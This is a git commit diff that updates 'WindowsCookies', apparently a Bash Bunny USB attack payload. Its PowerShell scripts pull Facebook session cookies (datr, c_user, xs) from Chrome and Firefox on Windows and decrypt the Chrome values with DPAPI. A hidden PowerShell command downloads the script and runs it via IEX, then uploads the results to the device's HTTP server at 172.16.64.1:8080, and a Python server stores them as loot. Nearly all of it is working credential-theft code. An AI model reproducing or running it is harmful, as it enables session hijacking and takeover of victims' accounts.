Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)

payloads/library/WindowsCookies/README.md

@@ -1,13 +1,13 @@
 # WindowsCookies for Bash Bunnys
 
 Author: oXis    
-Version: Version 2.0    
+Version: Version 2.1    
 Credit: illwill, sekirkity, EmpireProject     
 
 ## Description
 
 Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession    
-Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines.    
+Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex)    
 Only payload.txt, server.py and p are required.    
 Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.    
 
@@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv
 | LED              | Status                                 |
 | ---------------- | -------------------------------------- |
 | Blue (blinking)  | Payload init                           |
-| White (blinking) | Setup RNDIS_ETHERNET  				    |
+| Yellow (blinking)| Setup RNDIS_ETHERNET  				    |
 | Green (blinking) | Done               				    |
 

payloads/library/WindowsCookies/get_facebook_cookies.ps1

@@ -32,19 +32,22 @@ function Get-FacebookCreds-Firefox() {
 	# First the magic bytes for the facebook string, datr size is 24
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$datr = $PwdMatches.groups[1]
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $datr = $PwdMatches.groups[1]
 
 	# First the magic bytes for the facebook string, c_user size is 15
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$c_user = $PwdMatches.groups[1]
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $c_user = $PwdMatches.groups[1]
 
 	# First the magic bytes for the facebook string, xs size is 44
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$xs = $PwdMatches.groups[1]
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $xs = $PwdMatches.groups[1]
 
-	"$env:computername ---> "
+	"Firefox ---> "
 	"datr is $datr ###"
 	"c_user is $c_user ###"
 	"xs is $xs ###"
@@ -79,7 +82,8 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
 
@@ -89,7 +93,8 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
 
@@ -99,11 +104,12 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
 
-	"$env:computername ---> "
+	"Chrome ---> "
 	"datr is $datr ###"
 	"c_user is $c_user ###"
 	"xs is $xs ###"
@@ -112,7 +118,7 @@ function Get-FacebookCreds-Chrome() {
 
 function Payload() {
 
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
 
 }

payloads/library/WindowsCookies/p

@@ -32,19 +32,22 @@ function Get-FacebookCreds-Firefox() {
 	# First the magic bytes for the facebook string, datr size is 24
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$datr = $PwdMatches.groups[1]
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $datr = $PwdMatches.groups[1]
 
 	# First the magic bytes for the facebook string, c_user size is 15
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$c_user = $PwdMatches.groups[1]
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $c_user = $PwdMatches.groups[1]
 
 	# First the magic bytes for the facebook string, xs size is 44
 	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$xs = $PwdMatches.groups[1]
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $xs = $PwdMatches.groups[1]
 
-	"$env:computername ---> "
+	"Firefox ---> "
 	"datr is $datr ###"
 	"c_user is $c_user ###"
 	"xs is $xs ###"
@@ -79,7 +82,8 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
 
@@ -89,7 +93,8 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
 
@@ -99,11 +104,12 @@ function Get-FacebookCreds-Chrome() {
 	$PwdMatches = $PwdRegex.Matches($BinaryText)
 
 	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
 	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
 
-	"$env:computername ---> "
+	"Chrome ---> "
 	"datr is $datr ###"
 	"c_user is $c_user ###"
 	"xs is $xs ###"
@@ -112,7 +118,7 @@ function Get-FacebookCreds-Chrome() {
 
 function Payload() {
 
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
 
 }

payloads/library/WindowsCookies/payload.txt

@@ -2,34 +2,31 @@
 #
 # Title:         Facebook session cookies dump
 # Author:        oXis (inspired by illwill)
-# Version:       2.0
+# Version:       2.1
 #
-# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
-# then stashes them in /root/udisk/loot/FacebookSession/l
-# Credits to these guys for their powershell scripts:
-# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
-# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
-# Also credit to illwill for the BrowerCreds payload
+# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
+# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
+# Credit to illwill for the BrowerCreds payload
 #
 # LED States 
 # Setup.............Setup
-# Blue..............Running Script
-# White.............Setup RNDIS_ETHERNET
+# Yellow............Setup RNDIS_ETHERNET
 # Green.............Got Browser Creds
 
-
 LED SETUP
 LOOTDIR=/root/udisk/loot/FacebookSession
 mkdir -p $LOOTDIR
+
 ATTACKMODE HID
 LED STAGE1
 GET SWITCH_POSITION
 cd /root/udisk/payloads/$SWITCH_POSITION/
+# server.py can now instant bind sockets 
+iptables -A OUTPUT -p udp --dport 53 -j DROP
 ./server.py &
-sleep 1
 
 #Dump Chrome Cookies
-RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
+RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
 
 LED STAGE2
 ATTACKMODE RNDIS_ETHERNET

payloads/library/WindowsCookies/server.py

@@ -3,10 +3,9 @@ from os import curdir
 from os.path import join as pjoin
 
 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-# from http.server import BaseHTTPRequestHandler, HTTPServer
 
 class StoreHandler(BaseHTTPRequestHandler):
-    store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l')
+    store_path = "/root/udisk/loot/FacebookSession"
     get_path = pjoin(curdir, 'p')
 
     def do_GET(self):
@@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler):
                 self.wfile.write(fh.read().encode())
 
     def do_POST(self):
-        if self.path == '/l':
-            length = self.headers['content-length']
-            data = self.rfile.read(int(length))
+        length = self.headers['content-length']
+        data = self.rfile.read(int(length))
 
-            with open(self.store_path, 'a') as fh:
-                fh.write(data.decode() + "\n")
+        with open(self.store_path + self.path, 'a') as fh:
+            fh.write(data.decode() + "\n")
 
-            self.send_response(200)
+        self.send_response(200)
 
 
 server = HTTPServer(('', 8080), StoreHandler)
 server.serve_forever()
-